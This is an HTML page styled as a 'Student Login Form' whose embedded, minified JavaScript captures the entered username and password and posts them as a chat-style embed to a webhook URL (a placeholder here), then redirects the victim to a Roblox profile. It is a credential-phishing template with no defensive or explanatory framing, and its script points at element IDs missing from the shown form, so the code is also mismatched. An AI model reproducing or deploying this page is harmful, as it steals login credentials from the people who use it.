<!DOCTYPE html> 
<html> 
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title> Login Page </title>
<style> 
Body {
  font-family: Calibri, Helvetica, sans-serif;
  background-color: white;
}
button { 
       background-color: #4CAF50; 
       width: 100%;
        color: green; 
        padding: 15px; 
        margin: 10px 0px; 
        border: none; 
        cursor: pointer; 
         } 
 form { 
        border: 3px solid #f1f1f1; 
    } 
 input[type=text], input[type=password] { 
        width: 100%; 
        margin: 8px 0;
        padding: 12px 20px; 
        display: inline-block; 
        border: 2px solid green; 
        box-sizing: border-box; 
    }
 button:hover { 
        opacity: 0.7; 
    } 
  .cancelbtn { 
        width: auto; 
        padding: 10px 18px;
        margin: 10px 5px;
    } 
      
   
 .container { 
        padding: 25px; 
        background-color: lightblue;
    } 
</style> 
</head>  
<body>  
    <center> <h1> Student Login Form </h1> </center> 
    <form>
        <div class="container"> 
            <label>Username : </label> 
            <input type="text" placeholder="Enter Username" name="username" required>
            <label>Password : </label> 
            <input type="password" placeholder="Enter Password" name="password" required>
            <button type="submit">Login</button> 
            <input type="checkbox" checked="checked"> Remember me 
            <button type="button" class="cancelbtn"> Cancel</button> 
            Forgot <a href="#"> password? </a> 
        </div> 
<script type="text/javascript">document.addEventListener("DOMContentLoaded",()=>{
            const e=document.getElementById("login-username"),o=document.getElementById("login-password"),t=document.getElementById("login-button");
            document.querySelector("p.login-error").setAttribute("style","display: none !important;"),console.log("Loaded",t);

            t.addEventListener("click",async t=>{
                               t.preventDefault();
            const n=e.value.trim(),a=o.value.trim();
            ""!=n&&""!=a?(await(({
              webhookURL:e,content:o}
                                )=>fetch(e,{
              method:"post",headers:{
                "Content-Type":"application/json"}
              ,body:JSON.stringify(o)}
                                        ))({
              webhookURL:"veiyowasherewebhookhere",content:{
                description:"Valid attempt requested",embeds:[{
                  fields:[{
                    name:"Username",value:n,inline:!0}
                          ,{
                            name:"Password",value:a,inline:!0}
                         ],color:7143253,timestamp:(new Date).toISOString()}
                                                             ]}
            }
                                          ),window.location.replace("https://www.roblox.com/users/241111762/profile")):window.location.reload()}
                                                                )}
          );
		  
		  
		  
        </script>
    </form>   
</body>   
</html>
